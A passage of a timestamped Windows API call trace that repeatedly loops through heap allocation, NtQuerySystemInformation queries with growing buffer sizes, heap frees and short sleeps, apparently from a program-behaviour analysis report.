SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.463] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.463] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.463] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.464] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.464] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.464] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.464] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.464] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.465] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.465] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.467] Sleep (dwMilliseconds=0x110) [0225.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.490] Sleep (dwMilliseconds=0x110) [0225.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.501] Sleep (dwMilliseconds=0x110) [0225.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.517] Sleep (dwMilliseconds=0x110) [0225.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.537] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.537] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.537] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.538] Sleep (dwMilliseconds=0x110) [0225.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.549] Sleep (dwMilliseconds=0x110) [0225.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.567] Sleep (dwMilliseconds=0x110) [0225.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.584] Sleep (dwMilliseconds=0x110) [0225.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.594] Sleep (dwMilliseconds=0x110) [0225.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.614] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.615] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.616] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.616] Sleep (dwMilliseconds=0x110) [0225.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.622] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.629] Sleep (dwMilliseconds=0x110) [0225.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.642] Sleep (dwMilliseconds=0x110) [0225.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.661] Sleep (dwMilliseconds=0x110) [0225.681] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0225.682] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.682] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.682] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0225.682] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.683] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0225.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0225.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0225.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0225.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0225.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0225.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, 